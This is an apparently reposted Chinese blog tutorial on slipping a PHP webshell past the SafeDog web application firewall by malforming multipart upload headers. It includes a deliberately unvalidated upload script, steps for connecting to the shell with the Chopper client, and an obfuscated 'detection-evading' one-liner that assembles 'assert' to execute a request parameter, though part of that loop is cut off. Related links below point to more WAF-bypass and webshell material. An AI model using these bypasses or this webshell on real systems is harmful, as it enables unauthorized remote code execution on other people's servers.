php网站安全狗绕过,绕过网站安全狗拦截,上传Webshell技巧总结 | 附免杀PHP一句话...

最新推荐文章于 2023-05-13 14:18:41 发布
最新推荐文章于 2023-05-13 14:18:41 发布
阅读量575 收藏 1
点赞数
文章标签: php网站安全狗绕过

原标题:绕过网站安全狗拦截,上传Webshell技巧总结 | 附免杀PHP一句话

*本文原创作者:1_2,本文属FreeBuf原创奖励计划,未经许可禁止转载

这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的方法。

思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测。

废话不多说,切入正题。。。。

1、实验环境:

Windows Server 2003、 Apache/2.4.18、PHP/5.3.29、网站安全狗(Apache版)V3.5.12048

2、用于文件上传的PHP源码:

$path = dirname(__FILE__) . '/upload/';

$rand = rand(0,30);

move_uploaded_file($_FILES["file"]["tmp_name"],$path . $rand . $_FILES["file"]["name"]);

echo "File Path:" . $path . $rand . $_FILES["file"]["name"] . "
";

echo "OK";

?>

因为此次实验的目的是绕过网站安全狗,所以PHP源码上我没做任何检测,把上传的文件直接放在upload目录下。

3、先看一下正常的HTTP请求:

96fb7ec7008f01ff486fd942726af615.png

很明显,文件名为”yijuhua.php”被拦截。。。。

4、尝试%00截断:

e87c7c007255b3174462b139500094cc.png

很明显,失败了。。。

5、修改HTTP请求,构造畸形HTTP请求

(1)删除实体里面的Conten-Type字段:

c7601cf155200145a4ef669a4f8f23bd.png

f0a56ed644d34768198753fad772920f.png

绕过网站安全狗的拦截,成功上传WebShell。。。

(2)删除Content-Disposition字段里的空格:

8859ef99f8467f90851a4fae4bf653b0.png

1c0bb6e7909ee0463fb3d2a35453a971.png

abfbd8c6319b3f764dd41230f7ece4ec.png

(3)修改Content-Disposition字段值的大小写:

21d6b3b57879c5ec41814afdf69bd0aa.png

6、菜刀连接一句话:

2538364724f3bb724b6ecdab6501bb64.png

到此,上传WebShell结束,各位看明白了吗?

7、免杀PHP一句话:

/*

PHP一句话木马

assert($string)

*/

$arr = array('a','s','s','e','r','t');

$func = '';

for($i=0;$i

$func .= $func . $arr[$i];

}

$func($_REQUEST['c']);

?>

4c441eb1492e14eb397e3315240045c0.png

8、修复漏洞:

出现这种情况,我认为是网站安全狗在开发时没有考虑到畸形HTTP请求,而Apache却兼容畸形HTTP请求,所以能够上传成功。

*本文原创作者:1_2(QQ:965207103),本文属FreeBuf原创奖励计划,未经许可禁止转载返回搜狐,查看更多

责任编辑:

贝拉大帝
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
关于ASP.NET畸形HTTP请求信息泄露漏洞
lake2的专栏
12-31 4957
       Q&A       Q:为什么写这篇文章?       A:那天在群里聊,有个叫lis0的家伙叫我写的……    这个漏洞是半年前的事了,很老了吧,可是我现在才研究了一下,没办法,谁叫我消息闭塞呢——谁叫学校网络像垃圾一样……(汗~~~)    好了,首先找个网站看看漏洞信息吧。个人认为绿盟较好,信息更新快,呵呵,毕竟人家有商业利益驱动着啊。看这里:http://www.ns
http请求出现413错误码
qq_40805231的博客
09-06 5490
网站在进行文件上的时候出现了上文件失败,查看上时的请求连接,发现上的url报出了413的错误码。413的错误码是表示:请求实体太大。为什么会出现该问题?是因为nginx中的某处配置不够大       #允许客户端请求的最大单文件字节数    ...
Tomcat 中 HTTP 400:畸形的请求语法、无效的请求信息帧或者虚拟的请求路由(控制台没有报错提示)
DZ0529的博客
05-13 1044
上述完成后代码使得在时间框输入时,写清年月日即可,Tomcat清理一下,restart一下就可以启动项目了。此处我是前端入了日期参数,后台接收日期参数时格式不匹配导致。项目控制台中显示日期数据。
dirname(__FILE__) 介绍
weixin_34087301的博客
01-26 121
简单地说:      __FILE__     返回当前 路径+文件名      dirname(__FILE__) 返回当前文件路径的 路径部分 (后面没有“\”号)      dirname(dirname(__FILE__));得到的是文件上一层目录名(不含最后一个“\”号) <?php $path = __FILE__; echo $path; echo '<br/...
HTTP 400 错误 - 请求无效 (Bad request)
weixin_33898876的博客
11-12 905
为什么80%的码农都做不了架构师?>>> ...
2016最新phpwebshell安全狗
03-05
这个文件可能是经过特殊处理的,比如包含了技巧,使得它能够绕过安全狗的检测。 综上所述,这个压缩包提供的知识点主要集中在PHPWebshell技术和如何绕过Web应用防火墙,尤其是针对2016年环境的安全策略。这...
2016最新aspxwebshell安全狗
03-05
压缩文件夹里的aspx文件不会有任何报毒,过最新版安全狗。2016已测试
安全狗的aspx一句webshell
02-08
安全狗的aspx一句webshell 纯CS模式,经典
PHP网站中的一句木马安全性和防范措施的研究.pdf
最新发布
01-05
PHP网站中的一句木马安全性和防范措施的研究 本文研究了PHP网站中的一句木马安全性和防范措施,旨在帮助网站管理员和开发者更好地防御一句木马的攻击。下面是从文章中提炼出的知识点: 一、PHP一句木马的...
实战-从社工客服拿到密码登录后台加SQL注入绕过安全狗写入webshell到提权进内网漫游.pdf
03-21
本资源为一篇实战渗透测试笔记,记录了作者从社工客服拿到密码登录后台加 SQL 注入绕过安全狗写入 webshell 到提权进内网漫游的整个过程。 一、初探 作者首先尝试使用自制字典工具“御剑”扫描网站,但发现无法...
HTTP状态 400 - 错误的请求类型 状态报告描述 由于被认为是客户端对错误(例如:畸形的请求语法、无效的请求信息帧或者虚拟的请求路由),服务器无法或不会处理当前请求。
香菜的博客
11-17 2497
在往后端递参数时,报400错误!!! 总结原因: SpringMVC默认不支持String到Date的转换,一般出现这个错误,我们就可以判断出是前后端字段类型不匹配。我就是因为这个报错的哈哈哈哈,如果有其他的原因导致的报错,欢迎在下面评论哦! 解决方案: 在POJO实体类对象中,找到Date类型字段,在前面添加与前端对应的日期格式:@DateTimeFormat(pattern = "yyyy-MM-dd") 这样就可以接收到我们前端过来的数据了。 ...
通过URL欺骗安装木马
Flex天空
11-07 1204
我叫URL,即“Uniform Resource Locators”,意思是统一资源定位器。地址栏中的网址就属于我URL的一种表达方式。基本上所有访问网站的朋友都会使用到我,所以我的作用是很大的。也许很多朋友都不知道,我可是很会骗人的。特别是有一群自称黑客的家伙很喜欢让我欺骗你们,趁你们不留心,就让我带你进入植入了木马的网页。所以我今天要大胆的自揭其短,让你们看清我,千万不要被那些黑客利用我把你们
安全狗服务器自动重启,关于解决安全狗“您的请求过于频繁,已被管理员设置拦截”方法...
weixin_29798981的博客
07-31 1068
他们在使用安全狗后访问自己的网站或者访客在访问其他人的网站时经常会弹出“您的请求过于频繁,已被管理员设置拦截”的页面,如图所示首先我们应该先看一下在防护日志中安全狗有何记录拦截信息?我们可以看一下网站安全狗的防护日志,如图:可以看到,在安全狗的防护日志中显示了很多的“访问过于频繁”的拦截原因,拦截类型为:“CC攻击”那么也就说,问题就是出现在我们CC防护规则没有设置好,我们在配置安全狗的CC防护规...
安全狗绕过
alien0011的博客
06-09 3445
安全狗绕过(截至6.8号) 环境: phpstudy2018 安全狗apache版 sqllabs靶场 安全狗绕过思路: 安全狗是基于正则匹配的绕过,所以总是能够绕过其正则匹配实现sql的命令执行,需要对数据库语句灵活掌握。经过对安全狗的fuzz,测试其拦截规则,发现其实and、or这样的敏感字符是不会被直接拦截的,但是and加空格就会被拦截,其实绕过的中心可以向如何绕过空格偏移。 为了可以更清晰的认知注入语句是如何在数据库中执行的,我修改了sqli-lab的代...
SQL注入-安全狗apache绕过
遇事不决冲冲冲
05-26 2543
环境配置 Windows 10 phpstudy sqli-labs靶场 安全狗apache4.0.30255
绕过安全狗进行sql注入(MySQL)
热门推荐
一个安全研究员
07-31 1万+
过狗啦
【WAF剖析】——文件上安全狗bypass
Demo不是emo的博客
11-25 8015
文件上的WAF你见过吗,关注我,让我带你由简入难实战各个WAF,今天先来看看web安全渗透必会的安全狗WAF,你会绕吗?看我带你将它拿下
通过SELinux设置防止webshell.php一句木马访问Linux服务器上nginx代理网站外的其他资源
06-11
可以通过SELinux设置防止webshell.php一句木马访问Linux服务器上nginx代理网站外的其他资源,以下是具体步骤: 1. 确认SELinux状态:使用命令`getenforce`检查SELinux是否开启,如果输出`Enforcing`,则SELinux...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值